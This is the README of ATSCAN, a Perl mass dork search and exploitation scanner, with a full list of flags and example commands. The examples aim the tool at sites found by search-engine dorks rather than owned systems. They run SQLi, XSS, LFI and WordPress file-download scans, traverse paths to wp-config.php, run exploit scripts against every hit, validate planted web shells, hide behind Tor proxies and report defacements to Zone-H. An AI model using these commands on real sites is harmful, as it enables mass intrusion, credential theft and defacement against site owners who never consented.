ATSCAN SCANNER

Advanced Mass Search / Dork / Exploitation Scanner

Alisam Technology is not responsible for any misuse, damage caused by this script or attacking targets without prior mutual consent! It is your responsibility to obey laws!

Codename:	4n0n4t
AUTHOR:	Ali MEHDIOUI
GROUP:	Alisam@Technology

★ Description:

● Engines: [Google apis cache] Bing Ask Yandex Sogou Exalead Shodan ● Mass Dork Search ● Multiple instant scans. ● Mass Exploitation ● Use proxy. ● Random user agent. ● Random engine. ● Mass Extern commands execution. ● Exploits and issues search. ● XSS / SQLI / LFI / AFD scanner. ● Filter wordpress & Joomla sites. ● Wordpress theme and plugin detection. ● Find Admin page. ● Decode / Encode Base64 / MD5

● Ports scan. ● Collect IPs ● Collect E-mails. ● Auto detect errors. ● Auto detect forms. ● Auto detect Cms. ● Post data. ● Auto sequence repeater. ● Validation. ● Post and Get method ● IP Localisation ● Issues and Exploit search ● Interactive and Normal interface. ● And more...

★ Libreries to install:

Perl Required. Works in all platforms. Disponible in Blackarch and Dracos Linux.

★ Download:

● git clone https://github.com/AlisamTechnology/ATSCAN ● direct link: https://github.com/AlisamTechnology/ATSCAN

★ Permissions:

cd ATSCAN chmod +x ./atscan.pl

★ Installation:

chmod +x ./install.sh ./install.sh

★ Execution:

Portable Execution: perl ./atscan.pl Installed Tool Execution: atscan Menu: Applications > Web Application analysis > atscan

★ Repair Tool:

atscan --repair

★ Uninstall Tool:

atscan --uninstall

★ Commands:

--help / -h Help. --proxy Set tor proxy for scans [EX: --proxy "socks4://localhost:9050"] Set proxy [EX: --proxy "http://12.45.44.2:8080"] Set proxy list [EX: --proxy file] --prandom Random proxy [EX: --prandom file] or --prandom "socks://localhost:9050"] --motor / -m bing google ask yandex sogou exalead googleapis googlecache or all --apikey Apikey --cx Googleapis ID --mrandom Random of given engines --brandom Random all disponibles agents --freq Random time frequency (in seconds) --time set browser time out --dork / -d Dork to search [Ex: house [OTHER]cars [OTHER]hotel] --target / -t Target --level / -l Scan level (Number of results pages to scan) --zone Search engine country. --param / -p Set test parameter EX:id,cat,product_ID --save / -s Output. --source Html output file --bugtraq Serach exploits and issues --content Print request content --data Post and Get forms. See examples --vshell Validate by url ex: --HOST/shell.php or file --post Use post method --get Use get method --header Set headers --fullHeaders Print full request headers --host Domain name [Ex: site.com] --nobanner Hide tool banner --beep Produce beep sound if positive scan found. --ifend Produce beep sound when scan process is finished. --noverbose No scan verbose. --ping Host ping. --limit Limit max positive scan results. --valid / -v Validate by string at least 1 is matching --validAll Validate all given strings --status Validate by http header status --server Validate by server --ifinurl Get targets with exact string matching --sregex Get targets with exact regex matching --exclude Get targets where strings do not exist in html --excludeAll Get targets where all strings do not exist in html --unique Get targets with exact dork matching --replace Replace exact string --replaceFROM Replace from string to the end of target --exp / -e Exploit/Payload will be added to full target --expHost Exploit will be added to the host --expIp Exploit will be added to the host ip --xss Xss scan --sql Sqli scan --lfi Local file inclusion --joomrfi Scan for joomla local file inclusion. --shell Shell link [Ex: http://www.site.com/shell.txt] --wpafd Scan wordpress sites for arbitrary file download --admin Get site admin page --shost Get site subdomains --port port --tcp TCP port --udp UDP port --getlinks Get target html links --wp Wordpress site --joom Joomla site --zip Get zip files --md5 Convert to md5 --encode64 Encode base64 string --decode64 decode base64 string --TARGET Will be replaced by target in extern command --HOST Will be replaced by host in extern command --HOSTIP Will be replaced by host IP in extern command --PORT Will be replaced by open port in extern command --ips Collect Ips --geoloc Ip geolocalisation --regex Crawl to get strings matching regex --noquery Remove string value from Query url [ex: site.com/index.php?id=string] --command / -c Extern Command to execute --popup Execute Extern Command in new terminal window --zoneH Upload to Zone-H --saveCookie Cookies output file --setCookies Cookie file --email Collect emails rang(x-y) EX: --expHost "/index.php?id=rang(1-9)" --sql OR -t "site.com/index.php?id=rang(1-9)" --sql site.com/index.php?id=1 -> 9. repeat(txt-y) EX: --expHost "/index.php?id=repeat(../-9)wp-config.php" --status 200 OR -t "site.com/index.php?id=../wp-config.php" In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times [OTHER] To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3 --googleapi Google Apis --shodan Shodan search --count Search Shodan without Results --count Search Shodan --dnsreverset Shodan Reverse DNS Lookup --dnsresolve Shodan Resolve DNS Lookup --tokens String filters and parameters --querysearch Search the directory of saved Shodan search queries --query List the saved Shodan search queries --querytags List the most popular Shodan tags --myip List all services that Shodan crawls --services List all services that Shodan crawls --apinfo My Shodan API Plan Information --ports List of port numbers that the crawlers are looking for --protocols List all protocols that can be used when performing on-demand Internet scans via Shodan. --honeyscore Calculates honeypot score ranging from 0 (not a honeypot) to 1.0 (is a honeypot) in shodan --facets Shodan search facets --update Update tool --repair Repair or force tool update. --tool / -? Tool info. --config User configuration. --interactive / -i Interactive mode interface. --uninstall Uninstall Tool.

★ Examples:

● PROXY: Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050]. Proxy: --proxy [proxy] Ex: --proxy http://12.32.1.5:8080 or --proxy file Ex: --proxy my_proxies.txt ● RANDOM: Random proxy: --prandom [proxy file] Random browser: --brandom Random engine: --mrandom [ENGINES] ● SET HEADERS: atscan --dork [dork / dorks.txt] --level [level] --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'" atscan -t target --data "name=>username, email=>xxxxxx, pass=>xxxxx" --post --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'" ● SEARCH ENGINE: Search: atscan --dork [dork] --level [level] Search: atscan -d [dork] -l [level] --getlinks Set engine: atscan --dork [dork] --level [level] -m bing or google,ask,yandex or all Set selective engines: atscan -d [dork] -l [level] -m google,bing,.. Search with many dorks: atscan --dork dork1 [OTHER]dork2 [OTHER]dork3] --level [level] Get Server wordpress sites: atscan -t [target] --wp Search + output: atscan --dork [dorks.txt] --level [level] --save Search + get emails: atscan -d [dorks.txt] -l [level] --email Search + get site emails: atscan --dork site:site.com --level [level] --email Search + get ips: atscan --dork [dork] --level [level] --ips ● REGULAR EXPRESSIONS: Regex use: atscan [--dork [dork> / -t [target]] --level [level] --regex [regex] IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)) E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})' ● REPEATER: atscan -t site.com?index.php?id=rang(1-10) --sql atscan -t [target] --expHost "/index.php?id=rang(1-10)" --sql atscan -t [target] --expHost "/index.php?id=repeat(../-9)wp-config.php" ● PORTS atscan -t [ip] --port [port] [--udp / --tcp] atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp] atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command" ● ENCODE / DECODE: Generate MD5: --md5 [string] Encode base64: --encode64 [string] Decode base64: --decode64 [string] ● DATA: Data: atscan -t [target] --data "field1=>value1, field2=>value2, field3=>value3" [--post / --get /] Exploit: --exp/expHost --data "field1=>value1, field2=>value2, field3=>value3" --vshell [shell path] -v [string] / --status [code] [--post / --get / --upload] Wordlist: --data "field1=>value1, field2=>WORDLIST:" --vshell [shell path] -v [string] / --status [code] [--post / --get] ● EXTERNAL COMMANDS: atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET" atscan --dork [dork / dorks.txt] --level [level] --command "file" atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST" atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP" atscan -d "index of /lib/scripts/dl-skin.php" -l 2 -m bing --command "php WP-dl-skin.php-exploit.php --TARGET" atscan --shodan --search [string] --apikey [API KEY] -command [extern_command] ● MULTIPLE SCANS: atscan --dork [dork> --level [10] --sql --lfi --wp .. atscan --dork [dork> --level [10] --replace [string => new_string] --exp/expHost [payload] [--sql / --lfi / --wp /...] atscan -t [ip] --level [10] [--sql / --lfi / --wp /...] atscan -t [target] [--sql / --lfi / --wp /...] ● IP LOCALISATION: atscan -t [ip/target] --geoloc ● SEARCH VALIDATION: atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/file] atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/file] atscan -d [dork / dorks.txt] -l [level] --status [code] / --exclude [string/file] atscan -d [dork / dorks.txt] -l [level] --ifinurl [string] atscan -d [dork / dorks.txt] -l [level] --sregex [regex] --valid [string] atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string] atscan -d [dork / dorks.txt] -l [level] --unique atscan -t [target / targets.txt] [--status [code] / --valid [string] atscan -t [target / targets.txt] --vshell [file path] atscan -d [dork / dorks.txt] -l [level] --exp/expHost [payload] --status [code] / --valid [string] atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string] atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string] atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string] atscan -d [dorks.txt] -l [level] --replaceFROM [string => new_string] --status [code] / --valid [string] atscan -d [dorks.txt] -l [level] --replace [string => new_string] --exp/expHost [payload] --status [code] / --valid [string] atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string] atscan -t [target / targets.txt] --valid [string] --exclude [string] ● ZONE-H: atscan -t [target / targets.txt] -v [string] --zoneH "notifier => --HOST/index.php" ● SEARCH EXPLOITS: atscan --bugtraq -d [string] -l 1 EX: atscan --bugtraq -d wordpress -l 1 atscan --bugtraq -d file.txt -l 1 atscan --bugtraq -d [string] -l 1--limit 10 ● GOOGLEAPIS SEARCH atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] -v [string] atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] --exp [exploit] atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] [ANY APTION] ● SHODAN SEARCH atscan --shodan --targget [ip or host or file] --apikey [API KEY] atscan --shodan --dork [string or file] --apikey [API KEY] atscan --shodan --dnsresolve [ip or host or file] --apikey [API KEY] atscan --shodan --dnsrevese [ip or host or file] --apikey [API KEY] atscan --shodan --count [query or file] --apikey [API KEY] atscan --shodan --query --apikey [API KEY] atscan --shodan --querysearch [query or file] --apikey [API KEY] atscan --shodan --querytags --apikey [API KEY] atscan --shodan --myip --apikey [API KEY] atscan --shodan --apinfo --apikey [API KEY] atscan --shodan --services --apikey [API KEY] atscan --shodan --ports --apikey [API KEY] atscan --shodan --tokens [string or file] --apikey [API KEY] ● UPDATE TOOL: atscan --update ● UNINSTALL TOOL: atscan --uninstall ● THANKS TO: Blackarch linux & Dragos Os developers to incorporate my project in their systems.